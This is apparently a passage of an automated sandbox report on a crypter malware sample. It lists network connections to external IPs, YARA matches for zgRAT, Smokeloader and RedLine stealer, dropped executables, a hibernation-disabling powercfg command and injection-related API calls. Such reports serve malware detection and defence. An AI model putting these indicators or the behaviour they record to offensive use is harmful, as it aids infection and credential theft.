                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                              Source: unknownHTTPS traffic detected: 173.231.16.77:443 -> 192.168.2.9:49707 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.9:49708 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.9:49725 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 162.241.61.218:443 -> 192.168.2.9:49726 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 162.241.61.218:443 -> 192.168.2.9:49729 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 54.231.236.201:443 -> 192.168.2.9:49730 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.74.161:443 -> 192.168.2.9:49735 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.9:49736 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 116.203.165.127:443 -> 192.168.2.9:49743 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 45.132.206.251:443 -> 192.168.2.9:49786 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.9:49789 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 116.203.165.127:443 -> 192.168.2.9:49792 version: TLS 1.2

                              Key, Mouse, Clipboard, Microphone and Screen Capturing

                              barindex
                              Source: Yara matchFile source: 00000021.00000002.2871041032.0000000008B51000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000C.00000002.2512039458.0000000002610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000C.00000002.2510215507.0000000002561000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\Tmp8FCF.tmpJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\Tmp8FFF.tmpJump to dropped file

                              System Summary

                              barindex
                              Source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                              Source: 14.2.kCxbYlQ2A6NZXLbKZjtnUx3R.exe.4155570.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                              Source: 14.2.kCxbYlQ2A6NZXLbKZjtnUx3R.exe.4155570.0.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                              Source: 00000021.00000002.2871041032.0000000008B51000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                              Source: 0000000C.00000002.2512039458.0000000002610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                              Source: 0000000C.00000002.2511522701.0000000002600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                              Source: 0000000C.00000002.2521250191.00000000026BE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                              Source: 0000000C.00000002.2510215507.0000000002561000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                              Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exeFile dump: service123.exe.9.dr 314613760Jump to dropped file
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeFile dump: ClientSecureUpdater.exe.15.dr 976632104Jump to dropped file
                              Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042CD50 __aulldiv,VirtualAlloc,__aulldiv,__aulldiv,NtQuerySystemInformation,__aulldiv,WideCharToMultiByte,CharToOemA,VirtualFree,__aulldiv,2_2_0042CD50
                              Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exeCode function: 12_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,12_2_00401514
                              Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exeCode function: 12_2_00402F97 VirtualProtect,RtlCreateUserThread,NtTerminateProcess,12_2_00402F97
                              Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exeCode function: 12_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,12_2_00401542
                              Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exeCode function: 12_2_00403247 NtTerminateProcess,RtlInitUnicodeString,12_2_00403247
                              Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exeCode function: 12_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,12_2_00401549
                              Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exeCode function: 12_2_0040324F NtTerminateProcess,RtlInitUnicodeString,12_2_0040324F
                              Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exeCode function: 12_2_00403256 NtTerminateProcess,RtlInitUnicodeString,12_2_00403256
                              Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exeCode function: 12_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,12_2_00401557
                              Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exeCode function: 12_2_0040326C NtTerminateProcess,RtlInitUnicodeString,12_2_0040326C
                              Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exeCode function: 12_2_00403277 NtTerminateProcess,12_2_00403277
                              Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exeCode function: 12_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,12_2_004014FE
                              Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exeCode function: 12_2_00403290 NtTerminateProcess,RtlInitUnicodeString,12_2_00403290
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0041B16F NtQueryDefaultLocale,ExitProcess,15_2_0041B16F
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_004199E9 NtQueryDefaultLocale,15_2_004199E9
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0041B347 NtQueryDefaultLocale,ExitProcess,15_2_0041B347
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_00419354 NtQueryDefaultLocale,15_2_00419354
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_00419389 NtQueryDefaultLocale,15_2_00419389
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0041B41F NtQueryDefaultLocale,ExitProcess,15_2_0041B41F
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0041A66B NtQueryDefaultLocale,ExitProcess,15_2_0041A66B
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0041A60F NtQueryDefaultLocale,ExitProcess,15_2_0041A60F
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_00419739 NtQueryDefaultLocale,15_2_00419739
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0041A854 NtQueryDefaultLocale,ExitProcess,15_2_0041A854
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0041A897 NtQueryDefaultLocale,ExitProcess,15_2_0041A897
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0041A93C NtQueryDefaultLocale,ExitProcess,15_2_0041A93C
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_00419ABE NtQueryDefaultLocale,15_2_00419ABE
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_00418CB1 NtQueryDefaultLocale,15_2_00418CB1
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_00419DF2 NtQueryDefaultLocale,15_2_00419DF2
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0041AD8D NtQueryDefaultLocale,ExitProcess,15_2_0041AD8D
                              Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exeCode function: 8_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,8_2_00409448
                              Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeCode function: 0_2_04E15DF10_2_04E15DF1
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeCode function: 0_2_04C366300_2_04C36630
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeCode function: 0_2_04C322400_2_04C32240
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeCode function: 0_2_04C35EFA0_2_04C35EFA
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeCode function: 0_2_04C308480_2_04C30848
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeCode function: 0_2_04C3C56C0_2_04C3C56C
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeCode function: 0_2_04C38F4F0_2_04C38F4F
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeCode function: 0_2_04C38F600_2_04C38F60
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeCode function: 0_2_04C308390_2_04C30839
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004272102_2_00427210
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004815802_2_00481580
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042C6702_2_0042C670
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004366C02_2_004366C0
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0046D6E02_2_0046D6E0
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004307402_2_00430740
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004517202_2_00451720
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004317E02_2_004317E0
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004429702_2_00442970
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0047EB602_2_0047EB60
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00437B102_2_00437B10
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00434B202_2_00434B20
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00509BD02_2_00509BD0
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00433BE02_2_00433BE0
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00434D402_2_00434D40
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004CEF102_2_004CEF10
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00440F202_2_00440F20
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004210E02_2_004210E0
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004021002_2_00402100
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004242B02_2_004242B0
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004213A02_2_004213A0
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004234702_2_00423470
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004414802_2_00441480
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042D5702_2_0042D570
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_005175152_2_00517515
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040B5E02_2_0040B5E0
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0056359F2_2_0056359F
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0054E59A2_2_0054E59A
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004056402_2_00405640
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004226402_2_00422640
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042A6602_2_0042A660
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004026302_2_00402630
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_005446D92_2_005446D9
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004437502_2_00443750
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_005177102_2_00517710
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_005137202_2_00513720
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004247302_2_00424730
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004218202_2_00421820
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041E9E02_2_0041E9E0
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_005629832_2_00562983
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0044ABA02_2_0044ABA0
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00425CA02_2_00425CA0
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042CD502_2_0042CD50
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00550D682_2_00550D68
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042DD202_2_0042DD20
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00543D302_2_00543D30
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00552DA02_2_00552DA0
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00567E9D2_2_00567E9D
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00401E902_2_00401E90
                              Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exeCode function: 5_2_014069585_2_01406958
                              Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exeCode function: 5_2_014019085_2_01401908
                              Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exeCode function: 5_2_014018FA5_2_014018FA
                              Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exeCode function: 5_2_014016885_2_01401688
                              Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exeCode function: 5_2_014016985_2_01401698
                              Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exeCode function: 8_2_0040840C8_2_0040840C
                              Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exeCode function: 9_1_004144C99_1_004144C9
                              Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exeCode function: 9_1_0040779F9_1_0040779F
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeCode function: 10_2_0175087010_2_01750870
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeCode function: 10_2_0175087810_2_01750878
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeCode function: 10_2_0175033D10_2_0175033D
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeCode function: 10_2_0175850C10_2_0175850C
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeCode function: 10_2_05A45FC410_2_05A45FC4
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeCode function: 10_2_05A42FDC10_2_05A42FDC
                              Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exeCode function: 12_2_026BE00C12_2_026BE00C
                              Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeCode function: 13_2_00D70BEF13_2_00D70BEF
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0041B16F15_2_0041B16F
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_004199E915_2_004199E9
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_00416B2C15_2_00416B2C
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0040A04B15_2_0040A04B
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0040900915_2_00409009
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0040903715_2_00409037
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0040A0D015_2_0040A0D0
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_004090E615_2_004090E6
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_004090EF15_2_004090EF
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0040D08515_2_0040D085
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0040A0BB15_2_0040A0BB
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0040A16815_2_0040A168
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0040917215_2_00409172
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0040910915_2_00409109
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0040A11F15_2_0040A11F
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_004071CC15_2_004071CC
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_004171DD15_2_004171DD
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_004061F215_2_004061F2
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_004071A515_2_004071A5
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0040A24A15_2_0040A24A
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0040925415_2_00409254
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0040825A15_2_0040825A
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0040920115_2_00409201
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0040622615_2_00406226
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0040A23D15_2_0040A23D
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_004062D815_2_004062D8
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0040A29615_2_0040A296
